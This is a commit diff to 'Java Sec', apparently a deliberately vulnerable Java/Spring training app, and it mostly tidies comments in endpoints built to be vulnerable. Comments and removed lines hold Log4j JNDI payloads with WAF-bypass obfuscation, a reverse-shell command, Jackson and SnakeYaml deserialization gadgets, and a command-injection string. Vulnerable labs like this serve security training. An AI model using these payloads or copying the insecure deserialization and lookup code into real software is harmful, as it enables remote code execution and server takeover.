🍺 Java Sec

Author: j3ers3

src/main/java/com/best/hello/controller/Admin.java

@@ -18,7 +18,6 @@
 @RequestMapping("/admin")
 public class Admin {
 
-
     @ApiOperation(value = "查询系统基本信息")
     @GetMapping("/info")
     @ResponseBody

src/main/java/com/best/hello/controller/ComponentsVul/FastjsonVul.java

@@ -33,7 +33,6 @@ public String vul(@RequestBody String content) {
             JSONObject jsonToObject = JSON.parseObject(content);
             log.info("[vul] Fastjson");
 
-            // 获取ob中name字段;
             return jsonToObject.get("name").toString();
 
         } catch (Exception e) {

src/main/java/com/best/hello/controller/ComponentsVul/JacksonVul.java

@@ -1,6 +1,5 @@
 package com.best.hello.controller.ComponentsVul;
 
-import com.fasterxml.jackson.core.JsonProcessingException;
 import com.fasterxml.jackson.databind.ObjectMapper;
 import io.swagger.annotations.Api;
 import org.springframework.web.bind.annotation.RequestBody;
@@ -12,17 +11,10 @@
 @RequestMapping("/Jackson")
 public class JacksonVul {
 
-    /**
-     *
-     * com.nqadmin.rowset.JdbcRowSetImpl类绕过了之前jackson-databind维护的黑名单类，并且JDK版本较低的话，可造成RCE。
-     * 可利用JDK版本：11.0.1、8u191、7u201、6u211之前
-     * 影响版本：2.0.0 <= FasterXML jackson-databind < 2.9.10.4
-     * pom引入版本低会报错，参考其他demo
-     */
     @RequestMapping("/vul")
     public String vul(@RequestBody String content) {
         try {
-            //String payload = "[\"com.nqadmin.rowset.JdbcRowSetImpl\",{\"dataSourceName\":\"ldap://127.0.0.1:1389/Exploit\",\"autoCommit\":\"true\"}]";
+            // String payload = "[\"com.nqadmin.rowset.JdbcRowSetImpl\",{\"dataSourceName\":\"ldap://127.0.0.1:1389/Exploit\",\"autoCommit\":\"true\"}]";
 
             ObjectMapper mapper = new ObjectMapper();
             mapper.enableDefaultTyping();

src/main/java/com/best/hello/controller/ComponentsVul/Log4jVul.java

@@ -17,18 +17,10 @@ public class Log4jVul {
      * 原理：一旦在log字符串中检测到${}，就会解析其中的字符串尝试使用lookup查询，因此只要能控制log参数内容，就有机会实现漏洞利用。
      * 反弹shell: java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,str_base64}|{base64,-d}|{bash,-i}" -A IP
      *
-     * bypass waf
      * content=${jndi:rmi://rmi.44qbby.dnslog.cn/a}
-     * content=${${::-j}ndi:rmi://mi.44qbby.dnslog.cn/ass}
-     * content=${${::-j}ndi:ldap://haha.44qbby.dnslog.cn/ass}
-     * content=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nono1.44qbby.dnslog.cn/ass}
-     * content=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://nono2.44qbby.dnslog.cn/ass}
-     *
-     * 修复：log4j2.formatMsgNoLookups=True，dnslog也就无回显了
      */
     @PostMapping(value = "/vul")
     public String vul(@RequestParam("q") String q) {
-        // ${jndi:ldap://lala.pvs999.ceye.io/test}
         System.out.println(q);
         logger.error(q);
         return "Log4j2 JNDI Injection";

src/main/java/com/best/hello/controller/Deserialize/XMLDecoderVul.java

@@ -22,14 +22,6 @@ public class XMLDecoderVul {
      * XMLDecoder 是JDK的一个对象转XML的工具。所以本质上 XMLEncoder 与 XMLDecoder 也是一种序列化（编码）与反序列化（解码）的操作。
      * XMLDecoder在JDK 1.4~JDK 11中都存在反序列化漏洞安全风险。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。在项目中应禁止使用XMLDecoder方式解析XML内容
      * 在weblogic中多个包（wls-wast、wls9_async_response、_async）使用了该类
-     * <p>
-     * XML 标签属性介绍
-     * - java 标签：表示使用的 Java 版本信息 以及创建该 XML 文档所使用的类
-     * - object 标签：表示对象，class 指对象具体的类型
-     * - void 标签：表示函数调用、赋值等操作，method 指定具体的方法名称
-     * - int 标签：表示数值类型
-     * - string 标签：表示字符串
-     * - array 标签：表示数组，class 表示数组的类型，length 表示数组的长度，内部 void 标签的 index 属性表示数组的索引值
      */
 
     public static void main(String[] args) {

src/main/java/com/best/hello/controller/Deserialize/YamlVul.java

@@ -12,13 +12,7 @@
 @RequestMapping("/Deserialize/yaml")
 public class YamlVul {
 
-    /**
-     * 常见场景：
-     * 远程服务器支持用户可以输入yaml格式的内容并且进行数据解析，没有做沙箱，黑名单之类的防控。（这种常见于云平台，如kubernetes
-     *
-     * @poc content=!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: 'rmi://127.0.0.1:2222/exp', autoCommit: true}
-     * @poc content=!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://127.0.0.1:2222"]]]]
-     */
+
     @ApiOperation(value = "vul：SnakeYaml 反序列化漏洞", notes = "yaml是用来处理数据的，相对于xml和json来说较少见")
     @PostMapping("/vul")
     public void yaml(String content) {

src/main/java/com/best/hello/controller/JNDI.java

@@ -23,7 +23,7 @@ public void vul(String content) {
         log.info("[vul] JNDI注入：" + content);
 
         try {
-            //String payload = "rmi://127.0.0.1:1099/beu8rp";
+            // String payload = "rmi://127.0.0.1:1099/beu8rp";
             // lookup：通过名字检索执行的对象，当lookup()方法的参数可控时，攻击者便能提供一个恶意的url地址来加载恶意类。
 
             Context ctx = new InitialContext();

src/main/java/com/best/hello/controller/Login.java

@@ -21,6 +21,8 @@ public class Login {
     @ApiOperation(value = "登录")
     @RequestMapping("/user/login")
     public String login(@RequestParam("username") String username, @RequestParam("password") String password, @RequestParam("captcha") String captcha, Model model, HttpSession session, HttpServletRequest request) {
+
+        // 验证码复用
         if (!CaptchaUtil.ver(captcha, request)) {
             CaptchaUtil.clear(request);
             model.addAttribute("msg", "验证码不正确");

src/main/java/com/best/hello/controller/RCE/LoadJsVul.java

@@ -28,9 +28,6 @@ public class LoadJsVul {
     @GetMapping("/vul")
     public String jsEngine(String url) {
         try {
-            // 通过脚本名称获取
-            // ScriptEngine engine = new ScriptEngineManager().getEngineByName("JavaScript");
-            // 通过文件扩展名获取
             ScriptEngine engine = new ScriptEngineManager().getEngineByExtension("js");
 
             // Bindings：用来存放数据的容器

src/main/java/com/best/hello/controller/RCE/RuntimeVul.java

@@ -53,17 +53,4 @@ public static void main(String[] args) {
         }
     }
 
-
-    @ApiOperation(value = "safe：这种方式不存在命令执行")
-    @RequestMapping("/safe")
-    public static void safe(String cmd) {
-        String test = ";echo 1 > 1.txt";
-        String Command = "ping 127.0.0.1" + test;
-
-        try {
-            Runtime.getRuntime().exec(Command);
-        } catch (IOException e) {
-            e.printStackTrace();
-        }
-    }
 }